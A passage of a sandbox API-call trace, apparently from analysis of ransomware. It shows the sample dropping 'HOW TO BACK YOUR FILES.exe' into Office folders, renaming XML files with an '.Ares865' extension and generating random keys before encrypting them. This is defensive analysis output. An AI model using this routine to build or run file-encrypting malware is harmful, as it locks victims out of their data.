| out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14" [0075.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0075.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0075.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14") returned 55 [0075.912] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14" [0075.912] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.912] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.916] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.916] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5ec09600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ec09600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.916] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.917] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.918] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller" [0075.918] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0075.918] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0075.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller") returned 79 [0075.918] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller" [0075.918] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.918] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.928] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.928] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5ec2f760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ec2f760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.928] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.928] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.929] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us" [0075.929] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31f508 | out: hHeap=0x2b0000) returned 1 [0075.929] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2660 | out: hHeap=0x2b0000) returned 1 [0075.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us") returned 90 [0075.929] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us" [0075.929] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.929] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.934] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.934] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e501370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5ec2f760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ec2f760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.934] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.934] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.934] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.Ares865") returned 108 [0075.934] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0075.939] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0075.939] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2424) returned 1 [0075.939] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0075.940] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0075.940] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.943] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0075.943] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0075.943] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.944] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.Ares865") returned 110 [0075.944] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml.ares865"), dwFlags=0x1) returned 1 [0075.945] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0075.945] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1800) returned 1 [0075.945] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0075.946] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0075.946] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.947] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0075.948] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0075.948] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.949] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR" [0075.949] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8878 | out: hHeap=0x2b0000) returned 1 [0075.949] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2640 | out: hHeap=0x2b0000) returned 1 [0075.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR") returned 86 [0075.949] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR" [0075.949] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.949] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.954] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.954] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83258520, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x5ec558c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ec558c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.954] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.954] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.954] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.Ares865") returned 104 [0075.954] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0075.956] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0075.956] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=20577) returned 1 [0075.956] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0075.957] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0075.957] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.979] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0075.985] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0075.985] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.985] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.Ares865") returned 107 [0075.985] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.ares865"), dwFlags=0x1) returned 1 [0075.988] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0075.988] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=8723) returned 1 [0075.988] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0075.989] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0075.989] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.991] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0075.998] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0075.998] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.999] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us" [0075.999] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31f448 | out: hHeap=0x2b0000) returned 1 [0075.999] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2500 | out: hHeap=0x2b0000) returned 1 [0075.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us") returned 91 [0075.999] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us" [0075.999] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.999] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.003] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.003] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b66320, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x5ecede40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ecede40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.003] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.003] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.004] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.Ares865") returned 109 [0076.004] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0076.006] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.006] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=6241) returned 1 [0076.006] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0076.007] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.007] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.009] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0076.010] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.010] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.011] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.Ares865") returned 112 [0076.011] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml.ares865"), dwFlags=0x1) returned 1 [0076.012] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.012] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=9503) returned 1 [0076.012] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0076.013] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.013] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.018] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0076.019] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.019] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.019] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us" [0076.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3196d0 | out: hHeap=0x2b0000) returned 1 [0076.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24e0 | out: hHeap=0x2b0000) returned 1 [0076.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us") returned 95 [0076.019] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us" [0076.019] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.019] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.024] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.024] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ba9ab90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5ed13fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, 